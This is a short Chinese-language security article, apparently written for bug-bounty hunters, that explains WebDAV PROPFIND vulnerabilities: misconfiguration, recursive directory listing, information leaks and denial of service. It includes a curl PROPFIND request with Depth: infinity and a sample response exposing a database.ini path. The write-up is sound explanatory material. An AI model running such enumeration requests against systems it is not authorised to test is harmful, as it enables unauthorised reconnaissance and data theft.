SRC 小漏洞
PROPFIND 漏洞是与 WebDAV(Web Distributed Authoring and Versioning) 协议相关的一种安全漏洞,主要涉及 HTTP 方法 PROPFIND 的不当实现或配置。
PROPFIND 漏洞的原理
漏洞通常由以下原因引发:
- 不安全的配置服务器未正确限制
PROPFIND方法的访问权限。 - 目录遍历漏洞攻击者可能通过
PROPFIND请求访问本应受限的目录或文件(例如通过Depth: infinity参数递归遍历目录)。 - 信息泄露服务器可能通过
PROPFIND响应返回敏感信息(如内部文件路径、系统配置等)。 - 拒绝服务(DoS)攻击者可能发送大量复杂的
PROPFIND请求,导致服务器资源耗尽。
漏洞的影响
- 敏感信息泄露攻击者可获取服务器上的文件列表、目录结构或其他元数据。
- 权限绕过通过遍历目录访问受限文件(如配置文件、日志文件)。
- 服务器入侵结合其他漏洞(如文件上传漏洞),可能导致远程代码执行(RCE)。
- 服务中断通过 DoS 攻击使服务器无法响应正常请求。
示例
代码语言:javascript代码运行次数:0运行复制curl -X PROPFIND / -H "Depth: infinity" -H "Content-Type: text/xml" --data '<D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>'Depth: infinity表示递归遍历所有子目录。<D:allprop/>请求返回所有文件属性。
如果服务器配置不当,可能返回类似以下信息:
代码语言:javascript代码运行次数:0运行复制<D:multistatus xmlns:D="DAV:">
<D:response>
<D:href>/webdav/</D:href>
<D:propstat>
<D:prop>
<D:displayname>webdav</D:displayname>
<D:getlastmodified>Fri, 01 Jan 2023 00:00:00 GMT</D:getlastmodified>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/webdav/config/</D:href>
<D:propstat>
<D:prop>
<D:displayname>config</D:displayname>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response>
<D:href>/webdav/config/database.ini</D:href>
<D:propstat>
<D:prop>
<D:displayname>database.ini</D:displayname>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
- 攻击者通过响应发现了
/webdav/config/database.ini文件路径。攻击者可以直接下载该文件。